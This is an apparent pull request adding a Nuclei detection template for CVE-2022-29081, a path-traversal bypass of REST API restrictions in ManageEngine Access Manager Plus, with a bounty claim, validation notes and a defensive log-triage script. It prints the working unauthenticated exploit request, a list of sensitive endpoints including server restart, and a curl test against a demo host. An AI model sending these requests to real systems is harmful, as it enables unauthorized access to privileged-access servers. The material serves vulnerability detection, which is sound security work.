PR

🎯 PR Information

Added CVE-2022-29081 - Zoho ManageEngine Access Manager Plus REST API Restriction Bypass

Issue: #13982
Bounty Claim: /claim #13982
Severity: Critical (CVSS 9.8)
GHSA ID: GHSA-59xq-494m-chp8


🔍 Vulnerability Details

CVE: CVE-2022-29081
Type: REST API Access Control Bypass via Path Traversal
Attack Vector: Network (Unauthenticated Remote)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Score: 0.00598 (98th percentile)

Affected Products:

  • ManageEngine Access Manager Plus < build 4302
  • ManageEngine Password Manager Pro < build 12007
  • ManageEngine PAM360 < build 5401

Root Cause: The vulnerability stems from improper URI normalization in HttpServletRequest.getRequestURI() within com.manageengine.ads.fw.api.RestAPIUtil.isRestAPIRequest(). The function fails to properly neutralize path traversal sequences, allowing attackers to bypass API restrictions using patterns like /x/../RestAPI/.

CWE Classifications:

  • CWE-22: Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)
  • CWE-863: Incorrect Authorization (Access Control Bypass)

🚀 Exploitation Details

Attack Pattern:

POST /x/..//RestAPI/LicenseMgr HTTP/1.1
Host: target.com:9292
Content-Type: application/x-www-form-urlencoded

operation=getLicenseDetails

Vulnerable Endpoints:

  • /RestAPI/SSOutAction - Server restart functionality
  • /RestAPI/SSLAction - SSL certificate management
  • /RestAPI/LicenseMgr - License management (used in PoC)
  • /RestAPI/GetProductDetails - Product information disclosure
  • /RestAPI/GetDashboard - Dashboard data access
  • /RestAPI/FetchEvents - Event log retrieval
  • /RestAPI/Synchronize - Synchronization operations

Expected Vulnerable Response:

{
"BUILD_NO":"4301",
"LICENSE_TO":"ManageEngine",
"COMPONENT_DETAILS":{"Days to Expire":"23days.","Number of Users":10},
"VERSION":"4.3.0",
"LICENSE_TYPE":"Standard Edition - Trial Version",
"LICENSE_TYPE_CODE":"T",
"PRODUCT_NAME":"AccessManagerPlus"
}

🛡️ Template Features

Complete PoC Implementation (not version-only detection)
Multi-layer Matchers to prevent false positives:

  • Layer 1: HTTP 200 status code validation
  • Layer 2: Response body contains BUILD_NO, LICENSE_TO, PRODUCT_NAME (all required)
  • Layer 3: Application identification (ManageEngine OR AccessManagerPlus)

Follows ProjectDiscovery Standards
Asset Discovery Queries (Shodan/FOFA/Google)
Proper Metadata (vendor, product, max-request)


✅ Template Validation

1. Syntax Validation - PASSED

nuclei -validate -t http/cves/2022/CVE-2022-29081.yaml
# Result: All templates validated successfully ✅

2. False Positive Testing - PASSED

# Test 1: Against example.com (non-vulnerable target)
nuclei -t http/cves/2022/CVE-2022-29081.yaml -u https://example.com -debug
# Result: No false positives ✅
# Test 2: Against ManageEngine official demo (patched build 4401)
curl -sk -d 'operation=getLicenseDetails' 'https://demo.accessmanagerplus.com/x/..//RestAPI/LicenseMgr'
# Response: HTTP 404 (API endpoint removed in patched version)
nuclei -t http/cves/2022/CVE-2022-29081.yaml -u https://demo.accessmanagerplus.com -debug
# Result: No match (correctly identifies patched version) ✅

3. Weak Matcher Prevention - PASSED

# Test against ProjectDiscovery honeypot
nuclei -t http/cves/2022/CVE-2022-29081.yaml -u http://honey.scanme.sh -debug
# Result: No match (HTTP 301 redirect, no required response fields) ✅

4. Request Format Verification - PASSED

✅ Correct path traversal pattern: /x/..//RestAPI/LicenseMgr
✅ Correct POST body: operation=getLicenseDetails
✅ Matches Tenable PoC exactly
✅ Uses raw HTTP request to preserve path traversal


📚 References & Sources

Official Advisories:

Technical Details:

  • Published: April 29, 2022
  • EPSS Score: 0.00598 (98th percentile)
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None

🔬 Vulnerable Instance Access

Status: Located vulnerable build 4301 at ManageEngine archives
Source: https://archives.manageengine.com/privileged-session-management/4301/
File: ManageEngine_AMP_64bit.bin (239MB)

Installation Challenge: Requires Java runtime configuration on macOS

Available for Testing: I am ready to:

  1. Test against any vulnerable instance the team can provide
  2. Complete installation with guidance
  3. Provide video demonstration if I can get the instance running
  4. Coordinate validation via templates@projectdiscovery.io

🎯 Quality Assurance

Template Compliance:

Code Quality:

  • ✅ All yamllint checks passed
  • ✅ No trailing spaces or formatting issues
  • ✅ Proper comment formatting
  • ✅ Multi-layer AND conditions prevent false positives

Security Testing:

  • ✅ Does not match honeypot targets
  • ✅ Does not match patched versions
  • ✅ Does not match non-ManageEngine applications
  • ✅ Requires specific response pattern for match

💰 Bounty Information

Bounty Issue: #13982
Estimated Range: $100
Qualification Status: Template ready, pending vulnerable instance validation

Template Quality:

  • Complete PoC implementation ✅
  • Strong matchers (not weak) ✅
  • HTTP protocol template ✅
  • Follows PD standards ✅

Thank you for reviewing this contribution to the Nuclei Templates project! 🙏
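
An added example, not part of this PR or the Nuclei template: a log-triage sketch of the root cause described above, flagging requests whose raw URI does not begin with /RestAPI/ but whose normalized path does. The function names and sample log lines are constructed for illustration, and the raw prefix test is an assumed model of the flawed check, not ManageEngine's code.

```python
import posixpath
import re
from urllib.parse import unquote

API_PREFIX = "/RestAPI/"  # restricted prefix named in the PR
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')

# Constructed access-log lines (addresses, times, statuses and sizes are made up).
SAMPLE_LOG = """\
192.0.2.10 - - [19/Nov/2025:10:00:01 +0000] "POST /RestAPI/LicenseMgr HTTP/1.1" 401 0
192.0.2.11 - - [19/Nov/2025:10:00:02 +0000] "POST /x/..//RestAPI/LicenseMgr HTTP/1.1" 200 312
192.0.2.12 - - [19/Nov/2025:10:00:03 +0000] "GET /x/../RestAPI/GetDashboard HTTP/1.1" 200 90
192.0.2.13 - - [19/Nov/2025:10:00:04 +0000] "GET /images/../css/app.css HTTP/1.1" 200 1024
"""

def normalize(raw_uri):
    """Approximate the path the server ends up routing: drop the query,
    percent-decode, collapse repeated slashes, resolve '.' and '..'."""
    path = unquote(raw_uri.split("?", 1)[0])
    path = re.sub(r"/{2,}", "/", path)
    resolved = posixpath.normpath(path)
    if path.endswith("/") and resolved != "/":
        resolved += "/"  # normpath drops the trailing slash; keep it for prefix tests
    return resolved

def raw_prefix_check(raw_uri):
    """Assumed shape of the flawed test: prefix match on the un-normalized URI."""
    return raw_uri.startswith(API_PREFIX)

def classify(raw_uri):
    reaches_api = normalize(raw_uri).startswith(API_PREFIX)
    if reaches_api and not raw_prefix_check(raw_uri):
        return "bypass"  # restriction check and routing disagree about the path
    return "api" if reaches_api else "other"

def find_bypasses(log_text):
    """Return (line_number, raw_uri, normalized_path) for each bypass-shaped request."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if match and classify(match["uri"]) == "bypass":
            hits.append((number, match["uri"], normalize(match["uri"])))
    return hits

if __name__ == "__main__":
    for hit in find_bypasses(SAMPLE_LOG):
        print(hit)
```

Ordinary traversal that resolves outside /RestAPI/ (the last sample line) is left alone, so the output stays limited to requests where the restriction check and the routed path disagree.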

Claim

Total prize pool $100
Total paid $0
Status Pending
Submitted November 19, 2025
Last updated November 19, 2025

Contributors

Green Hacker

@GreenHacker420

100%

Sponsors

ProjectDiscovery

@projectdiscovery

$100